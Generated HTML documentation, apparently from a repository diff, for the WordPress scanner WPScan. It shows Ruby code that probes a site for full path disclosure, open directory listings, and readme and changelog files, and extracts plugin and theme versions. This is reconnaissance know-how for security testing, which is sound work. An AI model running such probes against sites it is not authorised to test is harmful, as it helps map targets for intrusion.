<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="full_path_disclosure_url-method" class="method-detail ">
<a name="method-i-full_path_disclosure_url"></a>
<div class="method-heading">
<span class="method-name">full_path_disclosure_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="full_path_disclosure_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_full_path_disclosure.rb, line 27</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">full_path_disclosure_url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-includes/rss-functions.php&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- full_path_disclosure_url-source -->
</div>
</div><!-- full_path_disclosure_url-method -->
<div id="has_full_path_disclosure-3F-method" class="method-detail ">
<a name="method-i-has_full_path_disclosure-3F"></a>
<div class="method-heading">
<span class="method-name">has_full_path_disclosure?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Check for Full Path Disclosure (FPD)</p>
<div class="method-source-code" id="has_full_path_disclosure-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_full_path_disclosure.rb, line 22</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_full_path_disclosure?</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">full_path_disclosure_url</span>())
<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{Fatal error}</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- has_full_path_disclosure-3F-source -->
</div>
</div><!-- has_full_path_disclosure-3F-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

939
doc/WpItem.html Normal file
View File

@@ -0,0 +1,939 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpItem</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_item_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_item.rb">lib/wpscan/wp_item.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Vulnerable.html">Vulnerable</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-3C-3D-3E">#<=></a></li>
<li><a href="#method-i-3D-3D">#==</a></li>
<li><a href="#method-i-3D-3D-3D">#===</a></li>
<li><a href="#method-i-changelog_url">#changelog_url</a></li>
<li><a href="#method-i-directory_listing-3F">#directory_listing?</a></li>
<li><a href="#method-i-extract_name_from_url">#extract_name_from_url</a></li>
<li><a href="#method-i-get_full_url">#get_full_url</a></li>
<li><a href="#method-i-get_sub_folder">#get_sub_folder</a></li>
<li><a href="#method-i-get_url_without_filename">#get_url_without_filename</a></li>
<li><a href="#method-i-has_changelog-3F">#has_changelog?</a></li>
<li><a href="#method-i-has_readme-3F">#has_readme?</a></li>
<li><a href="#method-i-readme_url">#readme_url</a></li>
<li><a href="#method-i-to_s">#to_s</a></li>
<li><a href="#method-i-version">#version</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpItem</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="base_url-attribute-method" class="method-detail">
<a name="base_url"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">base_url</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="name-attribute-method" class="method-detail">
<a name="name"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">name</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="path-attribute-method" class="method-detail">
<a name="path"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">path</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="type-attribute-method" class="method-detail">
<a name="type"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">type</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="vulns_file-attribute-method" class="method-detail">
<a name="vulns_file"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">vulns_file</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="vulns_xpath-attribute-method" class="method-detail">
<a name="vulns_xpath"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">vulns_xpath</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="wp_content_dir-attribute-method" class="method-detail">
<a name="wp_content_dir"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">wp_content_dir</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="wp_plugins_dir-attribute-method" class="method-detail">
<a name="wp_plugins_dir"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">wp_plugins_dir</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 25</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-ivar">@type</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>]
<span class="ruby-ivar">@wp_content_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>] <span class="ruby-operator">?</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>].<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/^\//</span>, <span class="ruby-string">&quot;&quot;</span>).<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/\/$/</span>, <span class="ruby-string">&quot;&quot;</span>) <span class="ruby-operator">:</span> <span class="ruby-string">&quot;wp-content&quot;</span>
<span class="ruby-ivar">@wp_plugins_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_plugins_dir</span>] <span class="ruby-operator">||</span> <span class="ruby-node">&quot;#@wp_content_dir/plugins&quot;</span>
<span class="ruby-ivar">@base_url</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-ivar">@path</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:path</span>]
<span class="ruby-ivar">@name</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:name</span>] <span class="ruby-operator">||</span> <span class="ruby-identifier">extract_name_from_url</span>
<span class="ruby-ivar">@vulns_file</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>]
<span class="ruby-ivar">@vulns_xpath</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>].<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/\$name\$/</span>, <span class="ruby-ivar">@name</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;base_url not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@base_url</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;path not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@path</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;wp_content_dir not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@wp_content_dir</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;name not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@name</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;vulns_file not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@vulns_file</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;type not set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-ivar">@type</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="3C-3D-3E-method" class="method-detail ">
<a name="method-i-3C-3D-3E"></a>
<div class="method-heading">
<span class="method-name">&lt;=&gt;</span><span
class="method-args">(other)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Compare</p>
<div class="method-source-code" id="3C-3D-3E-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 122</span>
<span class="ruby-keyword">def</span> <span class="ruby-operator">&lt;=&gt;</span>(<span class="ruby-identifier">other</span>)
<span class="ruby-identifier">other</span>.<span class="ruby-identifier">name</span> <span class="ruby-operator">&lt;=&gt;</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">name</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- 3C-3D-3E-source -->
</div>
</div><!-- 3C-3D-3E-method -->
<div id="3D-3D-method" class="method-detail ">
<a name="method-i-3D-3D"></a>
<div class="method-heading">
<span class="method-name">==</span><span
class="method-args">(other)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Compare</p>
<div class="method-source-code" id="3D-3D-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 112</span>
<span class="ruby-keyword">def</span> <span class="ruby-operator">==</span>(<span class="ruby-identifier">other</span>)
<span class="ruby-identifier">other</span>.<span class="ruby-identifier">name</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">name</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- 3D-3D-source -->
</div>
</div><!-- 3D-3D-method -->
<div id="3D-3D-3D-method" class="method-detail ">
<a name="method-i-3D-3D-3D"></a>
<div class="method-heading">
<span class="method-name">===</span><span
class="method-args">(other)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Compare</p>
<div class="method-source-code" id="3D-3D-3D-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 117</span>
<span class="ruby-keyword">def</span> <span class="ruby-operator">===</span>(<span class="ruby-identifier">other</span>)
<span class="ruby-identifier">other</span>.<span class="ruby-identifier">name</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">name</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- 3D-3D-3D-source -->
</div>
</div><!-- 3D-3D-3D-method -->
<div id="changelog_url-method" class="method-detail ">
<a name="method-i-changelog_url"></a>
<div class="method-heading">
<span class="method-name">changelog_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Url for changelog.txt</p>
<div class="method-source-code" id="changelog_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 132</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">changelog_url</span>
<span class="ruby-identifier">get_url_without_filename</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;changelog.txt&quot;</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- changelog_url-source -->
</div>
</div><!-- changelog_url-method -->
<div id="directory_listing-3F-method" class="method-detail ">
<a name="method-i-directory_listing-3F"></a>
<div class="method-heading">
<span class="method-name">directory_listing?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Is directory listing enabled?</p>
<div class="method-source-code" id="directory_listing-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 95</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">directory_listing?</span>
<span class="ruby-comment"># Need to remove to file part from the url</span>
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">get_url_without_filename</span>).<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{&lt;title&gt;Index of}</span>] <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- directory_listing-3F-source -->
</div>
</div><!-- directory_listing-3F-method -->
<div id="extract_name_from_url-method" class="method-detail ">
<a name="method-i-extract_name_from_url"></a>
<div class="method-heading">
<span class="method-name">extract_name_from_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Extract item name from a url</p>
<div class="method-source-code" id="extract_name_from_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 101</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">extract_name_from_url</span>
<span class="ruby-identifier">get_full_url</span>.<span class="ruby-identifier">to_s</span>[<span class="ruby-regexp">%{^(https?://.*/([^/]+)/)}</span>, <span class="ruby-value">2</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- extract_name_from_url-source -->
</div>
</div><!-- extract_name_from_url-method -->
<div id="get_full_url-method" class="method-detail ">
<a name="method-i-get_full_url"></a>
<div class="method-heading">
<span class="method-name">get_full_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Get the full url for this item</p>
<div class="method-source-code" id="get_full_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 57</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_full_url</span>
<span class="ruby-identifier">url</span> = <span class="ruby-ivar">@base_url</span>.<span class="ruby-identifier">to_s</span>.<span class="ruby-identifier">end_with?</span>(<span class="ruby-string">&quot;/&quot;</span>) <span class="ruby-operator">?</span> <span class="ruby-ivar">@base_url</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">:</span> <span class="ruby-node">&quot;#@base_url/&quot;</span>
<span class="ruby-comment"># remove first and last /</span>
<span class="ruby-identifier">wp_content_dir</span> = <span class="ruby-ivar">@wp_content_dir</span>.<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/^\//</span>, <span class="ruby-string">&quot;&quot;</span>).<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/\/$/</span>, <span class="ruby-string">&quot;&quot;</span>)
<span class="ruby-comment"># remove first /</span>
<span class="ruby-identifier">path</span> = <span class="ruby-ivar">@path</span>.<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/^\//</span>, <span class="ruby-string">&quot;&quot;</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">type</span> <span class="ruby-operator">==</span><span class="ruby-string">&quot;plugins&quot;</span>
<span class="ruby-comment"># plugins can be outside of wp-content. wp_content_dir included in wp_plugins_dir</span>
<span class="ruby-identifier">ret</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-node">&quot;#{url}#@wp_plugins_dir/#{path}&quot;</span>)
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">type</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;timthumbs&quot;</span>
<span class="ruby-comment"># timthumbs have folder in path variable</span>
<span class="ruby-identifier">ret</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-node">&quot;#{url}#{wp_content_dir}/#{path}&quot;</span>)
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">ret</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-node">&quot;#{url}#{wp_content_dir}/#{get_sub_folder}/#{path}&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">ret</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_full_url-source -->
</div>
</div><!-- get_full_url-method -->
<div id="get_sub_folder-method" class="method-detail ">
<a name="method-i-get_sub_folder"></a>
<div class="method-heading">
<span class="method-name">get_sub_folder</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get_sub_folder-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 43</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_sub_folder</span>
<span class="ruby-keyword">case</span> <span class="ruby-ivar">@type</span>
<span class="ruby-keyword">when</span> <span class="ruby-string">&quot;themes&quot;</span>
<span class="ruby-identifier">folder</span> = <span class="ruby-string">&quot;themes&quot;</span>
<span class="ruby-keyword">when</span> <span class="ruby-string">&quot;timthumbs&quot;</span>
<span class="ruby-comment"># not needed</span>
<span class="ruby-identifier">folder</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-node">&quot;unknown type #@type&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">folder</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_sub_folder-source -->
</div>
</div><!-- get_sub_folder-method -->
<div id="get_url_without_filename-method" class="method-detail ">
<a name="method-i-get_url_without_filename"></a>
<div class="method-heading">
<span class="method-name">get_url_without_filename</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Gets the full url for this item without filenames</p>
<div class="method-source-code" id="get_url_without_filename-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 76</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_url_without_filename</span>
<span class="ruby-identifier">location_url</span> = <span class="ruby-identifier">get_full_url</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">valid_location_url</span> = <span class="ruby-identifier">location_url</span>[<span class="ruby-regexp">%{^(https?://.*/)[^.]+\.[^/]+$}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">valid_location_url</span>
<span class="ruby-identifier">valid_location_url</span> = <span class="ruby-identifier">add_trailing_slash</span>(<span class="ruby-identifier">location_url</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-identifier">valid_location_url</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- get_url_without_filename-source -->
</div>
</div><!-- get_url_without_filename-method -->
<div id="has_changelog-3F-method" class="method-detail ">
<a name="method-i-has_changelog-3F"></a>
<div class="method-heading">
<span class="method-name">has_changelog?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>changelog.txt present?</p>
<div class="method-source-code" id="has_changelog-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 146</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_changelog?</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@changelog</span>
<span class="ruby-identifier">status</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">changelog_url</span>).<span class="ruby-identifier">code</span>
<span class="ruby-ivar">@changelog</span> = <span class="ruby-identifier">status</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@changelog</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_changelog-3F-source -->
</div>
</div><!-- has_changelog-3F-method -->
<div id="has_readme-3F-method" class="method-detail ">
<a name="method-i-has_readme-3F"></a>
<div class="method-heading">
<span class="method-name">has_readme?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>readme.txt present?</p>
<div class="method-source-code" id="has_readme-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 137</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_readme?</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@readme</span>
<span class="ruby-identifier">status</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">readme_url</span>).<span class="ruby-identifier">code</span>
<span class="ruby-ivar">@readme</span> = <span class="ruby-identifier">status</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@readme</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_readme-3F-source -->
</div>
</div><!-- has_readme-3F-method -->
<div id="readme_url-method" class="method-detail ">
<a name="method-i-readme_url"></a>
<div class="method-heading">
<span class="method-name">readme_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Url for readme.txt</p>
<div class="method-source-code" id="readme_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 127</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">readme_url</span>
<span class="ruby-identifier">get_url_without_filename</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;readme.txt&quot;</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- readme_url-source -->
</div>
</div><!-- readme_url-method -->
<div id="to_s-method" class="method-detail ">
<a name="method-i-to_s"></a>
<div class="method-heading">
<span class="method-name">to_s</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>To string. Adds a version number if detected</p>
<div class="method-source-code" id="to_s-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 106</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">item_version</span> = <span class="ruby-identifier">version</span>
<span class="ruby-node">&quot;#@name#{' v' + item_version.strip if item_version}&quot;</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- to_s-source -->
</div>
</div><!-- to_s-method -->
<div id="version-method" class="method-detail ">
<a name="method-i-version"></a>
<div class="method-heading">
<span class="method-name">version</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Returns version number from readme.txt if it exists</p>
<div class="method-source-code" id="version-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_item.rb, line 86</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">version</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@version</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">get_full_url</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;readme.txt&quot;</span>).<span class="ruby-identifier">to_s</span>)
<span class="ruby-ivar">@version</span> = <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-node">%{stable tag: #{WpVersion.version_pattern}}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@version</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- version-source -->
</div>
</div><!-- version-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

298
doc/WpOptions.html Normal file
View File

@@ -0,0 +1,298 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpOptions</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_options_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_options.rb">lib/wpscan/wp_options.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
